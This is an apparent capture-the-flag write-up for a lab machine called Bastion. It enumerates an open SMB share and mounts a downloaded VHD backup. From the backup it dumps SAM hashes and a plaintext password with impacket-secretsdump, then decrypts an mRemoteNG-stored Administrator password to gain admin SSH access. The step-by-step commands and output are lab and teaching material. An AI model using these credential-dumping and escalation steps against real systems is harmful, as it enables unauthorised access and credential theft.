Bastion

, , , , , , , ,

Tools

  • crackmapexec
  • smbclient
  • qemu-nbd
  • impacket-secretsdump

Getting User

Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
$ sudo nmap -sS 10.129.136.29                                             
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-02-07 02:48 EST
Nmap scan report for 10.129.136.29
Host is up (0.31s latency).
Not shown: 996 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 9.00 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
$ sudo nmap -sC -sV -p22,135,139,445 10.129.136.29                         
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-02-07 02:53 EST
Nmap scan report for 10.129.136.29
Host is up (0.18s latency).

PORT    STATE SERVICE      VERSION
22/tcp  open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_  256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: mean: -19m58s, deviation: 34m36s, median: 0s
| smb2-time: 
|   date: 2026-02-07T07:54:06
|_  start_date: 2026-02-07T07:42:50
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2026-02-07T08:54:05+01:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.11 seconds

Foothold

port 445 is open , so i can start with crackmapexec to see to enumerate any accessible shares

1
2
3
4
5
6
7
8
9
10
$ crackmapexec smb 10.129.136.29 --shares -u 'Guest' -p ''
SMB         10.129.136.29   445    BASTION          [*] Windows Server 2016 Standard 14393 x64 (name:BASTION) (domain:Bastion) (signing:False) (SMBv1:True)
SMB         10.129.136.29   445    BASTION          [+] Bastion\Guest: 
SMB         10.129.136.29   445    BASTION          [+] Enumerated shares
SMB         10.129.136.29   445    BASTION          Share           Permissions     Remark
SMB         10.129.136.29   445    BASTION          -----           -----------     ------
SMB         10.129.136.29   445    BASTION          ADMIN$                          Remote Admin
SMB         10.129.136.29   445    BASTION          Backups         READ            
SMB         10.129.136.29   445    BASTION          C$                              Default share
SMB         10.129.136.29   445    BASTION          IPC$                            Remote IPC

there’s a share called Backups which is accessible
let’s connect to the share and recursively download its content

1
2
3
4
5
6
7
8
9
10
11
$ smbclient -N //10.129.136.29/Backups
Try "help" to get a list of possible commands.
smb: \> RECRUSE ON
RECRUSE: command not found
smb: \> RECURSE ON
smb: \> PROMPT OFF
smb: \> mget *
getting file \note.txt of size 116 as note.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \SDT65CB.tmp of size 0 as SDT65CB.tmp (0.0 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \WindowsImageBackup\L4mpje-PC\MediaId of size 16 as WindowsImageBackup/L4mpje-PC/MediaId (0.0 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd of size 37761024 as WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd (4318.0 KiloBytes/sec) (average 3746.1 KiloBytes/sec)

note.txt reads as follows

1
2
3
4
$ cat note.txt 

Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.

there are 2 VHD files. the download of one of VHD files wasn’t complete because it was too large
let’s download it again. the file is called 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$ smbclient -N //10.129.136.29/Backups                                      
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Feb  7 03:20:06 2026
  ..                                  D        0  Sat Feb  7 03:20:06 2026
  BoYDQLtEFx                          D        0  Sat Feb  7 03:12:29 2026
  JDBGIMYOGA.txt                      A        0  Sat Feb  7 03:20:06 2026
  note.txt                           AR      116  Tue Apr 16 06:10:09 2019
  SDT65CB.tmp                         A        0  Fri Feb 22 07:43:08 2019
  SWMJUATQPY.txt                      A        0  Sat Feb  7 03:12:43 2026
  WindowsImageBackup                 Dn        0  Fri Feb 22 07:44:02 2019

                5638911 blocks of size 4096. 1177226 blocks available
smb: \> timeout 300000
io_timeout per operation is now 300000
smb: \> RECURSE ON
smb: \> prompt OFF
smb: \> RECURSE OFF
smb: \> cd WindowsImageBackup\L4mpje-PC\"Backup 2019-02-22 124351"\
smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\> mget 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd

and on a second terminal going to use watch to see the progress of the download to make sure its not stuck
if the file size increases every refresh that means its downloading

1
2
3
4
5
$ watch -n 1 ls -lh 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd

Every 1.0s: ls -lh 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd                kali: Sat Feb  7 03:50:17 2026

-rw-r--r-- 1 kali kali 1.6G Feb  7 03:50 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd

the file has finished downloading, with a total size of 5.1G

1
-rw-r--r-- 1 kali kali 5.1G Feb  7 03:58 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd

let’s mount the VHD with qemu-nbd
first load NBD kernel module 

1
$ sudo modprobe nbd max_part=8

then connect the VHD 

1
$ sudo qemu-nbd --connect=/dev/nbd1 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd

lets find the partition, its nbd1p1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
$ lsblk                               

NAME     MAJ:MIN RM  SIZE RO TYPE MOUNTPOINTS
sda        8:0    0   40G  0 disk 
├─sda1     8:1    0   39G  0 part /
├─sda2     8:2    0    1K  0 part 
└─sda5     8:5    0  975M  0 part [SWAP]
sr0       11:0    1 1024M  0 rom  
nbd0      43:0    0    0B  0 disk 
nbd1      43:16   0 14.9G  0 disk 
└─nbd1p1  43:17   0 14.9G  0 part 
nbd2      43:32   0    0B  0 disk 
nbd3      43:48   0    0B  0 disk 
nbd4      43:64   0    0B  0 disk 
nbd5      43:80   0    0B  0 disk 
nbd6      43:96   0    0B  0 disk 
nbd7      43:112  0    0B  0 disk 
nbd8      43:128  0    0B  0 disk 
nbd9      43:144  0    0B  0 disk 
nbd10     43:160  0    0B  0 disk 
nbd11     43:176  0    0B  0 disk 
nbd12     43:192  0    0B  0 disk 
nbd13     43:208  0    0B  0 disk 
nbd14     43:224  0    0B  0 disk 
nbd15     43:240  0    0B  0 disk

now we can mount it 

1
2
sudo mkdir -p /mnt/vhd
sudo mount /dev/nbd1p1 /mnt/vhd

we can now enumerate the files and look for something to get the user credentials

1
2
3
4
ls /mnt/vhd
'$Recycle.Bin'            'Program Files'  'System Volume Information'   autoexec.bat
'Documents and Settings'   ProgramData      Users                        config.sys
 PerfLogs

We can find the SAM, SYSTEM and SECURITY files located in Windows/System32/config
lets copy them

1
$ cp SAM SECURITY SYSTEM ~/htb/bastion

now we can use impacket-secretsdump to dump the hashes

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DefaultPassword 
(Unknown User):bureaulampje
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x32764bdcb45f472159af59f1dc287fd1920016a6
dpapi_userkey:0xd2e02883757da99914e3138496705b223e9d03dd
[*] Cleaning up...

apart from hashes, the dump has also revealed a plain password that belongs to L4mpje, so we now have a username and password

1
2
[*] DefaultPassword
(Unknown User): bureaulampje

we can now ssh with these credentials and get the user flag

1
2
3
4
5
6
7
8
9
$ ssh L4mpje@10.129.136.29

l4mpje@BASTION C:\Users\L4mpje>cd Desktop                                                                                       

l4mpje@BASTION C:\Users\L4mpje\Desktop>cat user.txt                                                                             
'cat' is not recognized as an internal or external command,                                                                     
operable program or batch file.                                                                                                 

l4mpje@BASTION C:\Users\L4mpje\Desktop>type user.txt

Getting Root

Information Gathering

looking at installed applications, i found mRemoteNG which stores encrypted password in conf files

1
2
3
4
5
dir /a "C:\Program Files"
dir /a "C:\Program Files (x86)"
reg query HKEY_LOCAL_MACHINE\SOFTWARE

22-02-2019  14:01    <DIR>          mRemoteNG

the stored credentials can be found in confCons.xml

1
2
3
4
5
6
7
l4mpje@BASTION C:\Users\L4mpje>dir "%APPDATA%\mRemoteNG"         
 Volume in drive C has no label.       
 Volume Serial Number is 1B7D-E692  
 
 Directory of C:\Users\L4mpje\AppData\Roaming\mRemoteNG
 
22-02-2019  14:03             6.316 confCons.xml

let’s copy the file to our system to inspect it

1
2
3
4
$ scp L4mpje@10.129.136.29:"C:/Users/L4mpje/AppData/Roaming/mRemoteNG/confCons.xml" .

L4mpje@10.129.136.29's password: 
confCons.xml

the config file tells us the following

1
2
3
4
5
6
7
$ cat confCons.xml                                                           
EncryptionEngine="AES" 
BlockCipherMode="GCM" 
KdfIterations="1000" 
FullFileEncryption="false" Protected="ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA" 
Username="Administrator" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
Hostname="127.0.0.1"

Privilege Escalation

we can now try and decrypt the Administrator‘s password using this online mRemoteNG Password Decoderl

the decrypted password is thXLHM96BeKL0ER2

we can now login and get the root flag

1
2
3
4
$ ssh administrator@10.129.136.29
administrator@10.129.136.29's password:

administrator@BASTION C:\Users\Administrator>